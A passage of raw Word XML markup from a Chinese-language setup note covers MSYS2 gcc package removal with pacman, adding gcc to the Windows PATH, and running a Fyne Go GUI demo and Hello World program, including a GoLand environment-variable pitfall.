      <w:r w:rsidRPr="00331268">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r w:rsidRPr="00331268">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00331268">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00331268">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
      <w:r w:rsidRPr="00331268">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>了，安装包通常：</w:t>
      </w:r>
      <w:r w:rsidR="00331268" w:rsidRPr="00331268">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C:\msys64\ucrt64\bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4DC729" w14:textId="08619234" w:rsidR="008B3C40" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载</w:t>
      </w:r>
      <w:r w:rsidR="00565C5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件包：如卸载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE2D22" w14:textId="5DE88E90" w:rsidR="00CC5F21" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将卸载指定的软件包及其依赖项。请注意，这可能</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会影响其他依赖于该软件包的软件</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281671C8" w14:textId="67C2D8F1" w:rsidR="00CC5F21" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3C40">
        <w:t>pacman -R mingw-w64-ucrt-x86_64-gcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0017C606" w14:textId="09C13916" w:rsidR="00CC5F21" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>卸载软件包及其所有无用的依赖项</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，您可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-s</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1488C8" w14:textId="2B8F55F4" w:rsidR="00CC5F21" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3C40">
        <w:t>pacman -Rs mingw-w64-ucrt-x86_64-gcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD027C4" w14:textId="24F759BE" w:rsidR="00CC5F21" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只是想卸载软件包的同时</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>保留其所有配置文件，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459259C7" w14:textId="6A14B70C" w:rsidR="00CC5F21" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3C40">
        <w:t>pacman -Rn mingw-w64-ucrt-x86_64-gcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8AFD63" w14:textId="28F728BD" w:rsidR="00CC5F21" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载软件包及其所有无用的依赖项，并</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>删除其所有配置文件</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -rs </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61278D7D" w14:textId="7F164906" w:rsidR="00CC5F21" w:rsidRPr="009715E0" w:rsidRDefault="008B3C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009715E0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pacman -Rns mingw-w64-ucrt-x86_64-gcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456BDC09" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68401CD0" w14:textId="71202BA3" w:rsidR="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD52CD" w14:textId="649551A6" w:rsidR="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16116308" w14:textId="6FDB94BD" w:rsidR="00D175FD" w:rsidRPr="0008330D" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008330D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C:\msys64\mingw64\bin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177DBB36" w14:textId="503178CF" w:rsidR="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，以便</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>cc g++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53476837" w14:textId="77777777" w:rsidR="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E52720" w14:textId="0BE97657" w:rsidR="00CC5F21" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043F9930" w14:textId="6D2A6CA4" w:rsidR="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>demo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531AD901" w14:textId="737823C8" w:rsidR="00CC5F21" w:rsidRPr="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D175FD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>go install fyne.io/fyne/v2/cmd/fyne_demo@latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0083EA7C" w14:textId="77777777" w:rsidR="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4803E829" w14:textId="46C7F80D" w:rsidR="00CC5F21" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如我，随后切目录到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE3CD8" w14:textId="34A3A6AB" w:rsidR="00CC5F21" w:rsidRPr="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D175FD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>E:\BiLing\golang-study\pkg\mod\fyne.io\fyne@v1.4.3\cmd\fyne_demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0FD0A" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291848EB" w14:textId="36364B09" w:rsidR="00CC5F21" w:rsidRPr="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该目录直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D175FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00D175FD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>o run main.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B22282" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E2A57B" w14:textId="5147BD85" w:rsidR="00CC5F21" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB5DB23" w14:textId="77777777" w:rsidR="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6089B4A0" w14:textId="13606B4C" w:rsidR="00D175FD" w:rsidRDefault="00220416" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goland</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坑点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的环境变量必须放“系统变量”而不是“用户变量”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8458A" w14:textId="77777777" w:rsidR="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1FD5D2" w14:textId="3E5557B4" w:rsidR="00220416" w:rsidRDefault="00220416" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行简单代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75957BFA" w14:textId="2A9257C2" w:rsidR="00220416" w:rsidRDefault="00220416" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">import </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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"fyne.io/fyne/v2/app"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fyne.io/fyne/v2/widget"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</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t xml:space="preserve">a := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>app</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>New</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t>w := a.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewWindow</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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Hello World"</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t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetContent</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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewLabel</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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Hello World!"</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t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ShowAndRun</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C8180" w14:textId="4B3D86F1" w:rsidR="00220416" w:rsidRDefault="00220416" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>会报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298B784" w14:textId="37D8B441" w:rsidR="00220416" w:rsidRPr="00220416" w:rsidRDefault="00220416" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"error while importing fyne.io/fyne/v2/app: build constraints exclude all Go files in C:\Users\geniu\go\pkg\mod\github.com\go-gl\gl@v0.0.0-20211210172815-726fda9656d6\v3.2-core\gl"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E369D35" w14:textId="77777777" w:rsidR="00220416" w:rsidRDefault="00220416" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="523A748A" w14:textId="56683CEC" w:rsidR="00220416" w:rsidRPr="00220416" w:rsidRDefault="00220416" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>需要注意，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的路径放在</w:t>
      </w:r>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的“系统变量”而非“用户变量”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372FCAD4" w14:textId="2549964C" w:rsidR="00220416" w:rsidRPr="00220416" w:rsidRDefault="00220416" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>goland</w:t>
      </w:r>
      <w:r w:rsidRPr="00220416">
